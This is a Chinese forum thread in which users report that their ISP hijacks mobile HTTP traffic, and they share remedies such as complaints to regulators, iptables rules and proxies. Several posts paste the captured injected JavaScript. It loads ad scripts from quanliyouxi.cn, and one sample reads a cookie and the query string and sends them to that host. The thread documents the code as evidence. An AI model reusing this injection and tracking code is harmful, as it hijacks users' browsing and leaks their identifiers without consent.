现在流量劫持这么猖獗,貌似国家也没有管的意思,有曝光或者办法治治这种问题么?

2017-11-16 23:25:13 +08:00
 thetast
我自己用电信宽带、移动宽带、移动 4G 都出现了不同程度的流量劫持,而且现在只劫持手机,基本不劫持电脑。这让这种问题很头疼。
至少今天深圳电信被我抓到了劫持 JS 的访问。专门用手机通过 Fiddler 来访问 HTTP 网站,果然抓到:

源地址: http://ptf.flyert.com/template/zhikai_n5app/js/swipe.js?cHVzaA=102811

请求结果:

var _atn_obj_ = new Object;
_atn_obj_.oldurl = 'http://ptf.flyert.com/template/zhikai_n5app/js/swipe.js?cHVzaA=102811';
_atn_obj_.unified_url = 'http://ntx.quanliyouxi.cn:2525/adv_select/ad_unified_access?SP=ABzs/PzoPOz83Lg7yXnpGRmpOgmJugy8vPzM/Pg86Dy8vPzM/Pg8/IysrPycjLz8fNz7/OyczRmJuDzs7J0c3L0cnL0c7LzYPOg87PzcfOzoPPg8+DiIiI0ZmThpqNi5qe0ZyQkoPOys7Px8vMzszJg82DzM/Pzw==';
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0);
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.unified_url;document.getElementsByTagName("head")[0].appendChild(a);},0);

多个 JS 都出现了类似的现象。有了证据,而且对方也是流氓(投诉多次,发现根本没用),有没有什么流氓的办法治呢?
9214 次点击
所在节点    宽带症候群
34 条回复
jy02201949
2017-11-17 11:32:45 +08:00
那是没碰到领导的底线,上次把国务院的劫持了曝光不到一天就紧急处理掉
liyvhg
2017-11-17 11:43:30 +08:00
@anheiyouxia 那就换个思路,打开某些政府网站,例如领导人简历页面,截图被插入广告的证据然后举报,之前 v2 好像有人这么搞过?
0hey0
2017-11-17 12:04:28 +08:00
罪名:破坏公共计算机安全罪
mytsing520
2017-11-18 11:43:21 +08:00
接下来运营商会造管道级别的 CDN,大文件(主要是视频)运营商自己缓存,减少互联互通产生的流量成本(来自联通 CDN 白皮书)
zhouyut001
2017-11-20 08:17:18 +08:00
@thetast 上传速度不是运营商说了算,国家的政策。你办理企业宽带就不会限制了
thetast
2017-11-21 22:32:25 +08:00
@zhouyut001 没觉得啊,不同城市不同,加上企业宽带也有限制啊
thetast
2017-11-21 22:33:14 +08:00
@mytsing520 CDN 没问题,如果 CDN 加速应该全世界都是有的。关键是劫持之后塞你自己的东西,那就太恶心了
zhouyut001
2017-11-22 15:15:46 +08:00
@thetast 重庆电信企业或者学校的专线是对的网络
Esded
2017-12-08 04:23:17 +08:00
我这里是清远市,中国电信,两天宽带也出现这种情况,投诉无门,说是非电信类广告他们无法屏蔽。
还有在百度搜索的时候,打开其中搜索结果的页面,按返回时会跳到百度搜索用设定好的关键字进行搜索
我相信这是大范围全省的劫持,有必要开个专门讨论 quanliyouxi.cn 广告问题的贴
kio.quanliyouxi.cn183.59.53.189 3074110909 广东省梅州市 电信
kio.quanliyouxi.cn183.59.53.187 3074110907 广东省梅州市 电信
ntx.quanliyouxi.cn183.59.53.188 3074110908 广东省梅州市 电信
ntx.quanliyouxi.cn121.15.207.243 2031079411 广东省 电信
var _atn_obj_ = new Object;
_atn_obj_.oldurl = 'http://js.t.sinajs.cn/open/thirdpart/js/pageapp/mobile/server.js?version=201606141500&cHVzaA=1512384756';
_atn_obj_.unified_url = 'http://kio.quanliyouxi.cn:2525/ad_unified_access?SP=ABys7Og8zPyM3OyM7Ly86gzc7Kz8uDrLLSuMbPz6+DzIPLy87Hz8+DzoPOys7NzMfLyMrJg87Kzs3Mx8vIysnPycbIz8zLg83NyMjJ';
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0);
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.unified_url;document.getElementsByTagName("head")[0].appendChild(a);},0);

function mycount_add_count(stype){
var script=document.createElement("script");
script.setAttribute("type", "text/javascript");
var URL = "http://kio.quanliyouxi.cn:2525/feedback";
var ck = getck("JSCOOKIEID");
if(ck == ""){
ck = "0";
}
var path = "";
if (window.location.search == "")
path = window.parent.location.search;
else
path = window.location.search;

path=decodeURIComponent(path);
path=path.replace(' ','+');
if (path != "") {
path = URL + path + "&stype="+stype;
} else {
path = URL;
}
path += "&ak="+ck;
script.setAttribute("src", path);
var heads = document.getElementsByTagName("head");
if(heads.length)
heads[0].appendChild(script);
else
document.documentElement.appendChild(script);
}

mycount_add_count(1);

//关闭页面
function closePage(){
var userAgent = navigator.userAgent;
if (userAgent.indexOf("Firefox") != -1 || userAgent.indexOf("Chrome") !=-1) {
window.location.href="about:blank";
} else {
window.close();
}
}


function getck(sname){//获取单个 cookies
var acookie=document.cookie.split("; ");
for(var i=0;i<acookie.length;i++){
var arr=acookie[i].indexOf("=");
if(arr > 0){
var start = acookie[i].substring(0, arr);
var end = acookie[i].substring(arr+1, acookie[i].length);
if(sname==start){
return end;
}
}else{
return "";
}
if(sname==arr[0]){
if(arr.length>1){
return unescape(arr[1]);
}else{

}
}
}
return "";
}
Esded
2017-12-08 04:24:08 +08:00
我这里是清远市,中国电信,两条 宽带也出现这种情况,投诉无门,说是非电信类广告他们无法屏蔽。
a86913179
2017-12-13 09:51:58 +08:00
http 劫持要解决,需要 linux 类网关 iptables drop 掉,dns 劫持需要非 53 端口,自己找台 VPS 架一个。其实最好的方法是买台线路好的 VPS 能跑满带宽的,直接全局代理!
thetast
2018-04-23 10:35:02 +08:00
最后的解决——投诉工信部,提供实锤,刚开始还赖说不是深圳的广告,最后还是给屏蔽了。
kevin860
2018-05-25 06:01:35 +08:00
@thetast 发现我的网页也有这种劫持,不知道这种劫持的原理是什么,是从哪一步开始劫持的

出现这种网址在页面里
http://183.59.53.202:3535/adv_select/ad_unified_access?SP=ABzs/PzoPOz8/Ig7yXnpGRmpOgmJugy8vPzM/Pg86Dy8vPzM/Pg8/IysrPyMvJycnNyL/OyczRmJuDzs7M0cbN0c7KxtHNzM+DzoPNz8zGzsqDz4PPg4yXnpGYl4rRhpCKj56G0Zycg87KzcjOxsfOyMuDzoPP
worldtongfb
2020-06-22 16:00:44 +08:00
@kevin860 #33 今天发现这个问题, 深圳电信 http 会插入这个地址,方法就是返回内容的时候在 head 头插 script

这种方法只能对付 http 网站,https 解不出来就不行了

访问了下结果就是个标识 id,根据你的 ua 电脑上 js 会异常 其他的没影响,手极端估计就会跳广告了

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/407073

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX